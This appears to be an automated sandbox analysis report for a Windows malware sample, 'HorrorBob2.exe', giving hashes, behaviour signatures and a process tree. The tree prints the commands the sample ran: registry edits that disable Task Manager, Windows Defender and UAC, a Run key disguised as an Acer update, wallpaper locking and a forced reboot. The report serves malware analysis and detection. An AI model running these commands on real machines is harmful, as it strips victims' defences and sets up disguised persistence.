Analysis

  • max time kernel
    9s
  • max time network
    12s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08-11-2024 14:13

Errors

Reason
Machine shutdown

General

  • Target

    Dest/HorrorBob2.exe

  • Size

    11.9MB

  • MD5

    9331b20120075b2685d3888c196f2e34

  • SHA1

    1af7d3dc4576ef8aaa06fa3199cf422b7657950b

  • SHA256

    98a804d373c7e0e4f80155df20358436e066ecf31c522c31df2ba46923ac68c2

  • SHA512

    83636067d46b1362a6e0e5af56222d170d337fa7b0c4048b8f04c9df0ca35c3634a7254e6226886b00f9894e4353d6ac6b2e4e760bab320058cebe37c7c0cd7b

  • SSDEEP

    196608:zHvwfYWqhZPHE5D7cdPNPi17S+IRTX7UYVlj0EcLnKXanF6eeBUsjD2ABShiFiJt:vZ8R7c5527SpRTXQYVlYEGnKKF6eeWgO

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
    "C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2884
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3920
      • C:\Windows\SysWOW64\cscript.exe
        cscript prompt.vbs
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1320
      • C:\Windows\SysWOW64\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2532
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
        3⤵
        • Sets desktop wallpaper using registry
        • System Location Discovery: System Language Discovery
        PID:4756
      • C:\Windows\SysWOW64\rundll32.exe
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        3⤵
        • System Location Discovery: System Language Discovery
        PID:244
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:4840
      • C:\Windows\SysWOW64\reg.exe
        Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2368
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:104
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:4836
      • C:\Windows\SysWOW64\net.exe
        net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4844
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1264
      • C:\Windows\SysWOW64\shutdown.exe
        shutdown /r /t 00
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1044
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:1780

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat

    Filesize

    5KB

    MD5

    b11c0b55dba339bbe3169584fa0eedd8

    SHA1

    8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9

    SHA256

    f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073

    SHA512

    8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

  • C:\Users\Admin\AppData\Local\Temp\A345.tmp\Service64.exe

    Filesize

    11.4MB

    MD5

    b53852cb556ec28efc39b986caddb791

    SHA1

    5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a

    SHA256

    ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a

    SHA512

    7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599

  • C:\Users\Admin\AppData\Local\Temp\A345.tmp\blood.bmp

    Filesize

    3.8MB

    MD5

    040d29b801e3488f7aee3f9708128eea

    SHA1

    433591a971325f7529cbb7a1d16645ff65ee10c7

    SHA256

    fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de

    SHA512

    79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826

  • C:\Users\Admin\AppData\Local\Temp\A345.tmp\prompt.vbs

    Filesize

    207B

    MD5

    52ac951762c9b42fb4492dfdde2ba4ae

    SHA1

    0821a0dea46432fc4db10a2dc6312d42a872ab9f

    SHA256

    9bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3

    SHA512

    c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530

  • memory/2884-0-0x0000000000400000-0x000000000132F000-memory.dmp

    Filesize

    15.2MB

  • memory/2884-18-0x0000000000400000-0x000000000132F000-memory.dmp

    Filesize

    15.2MB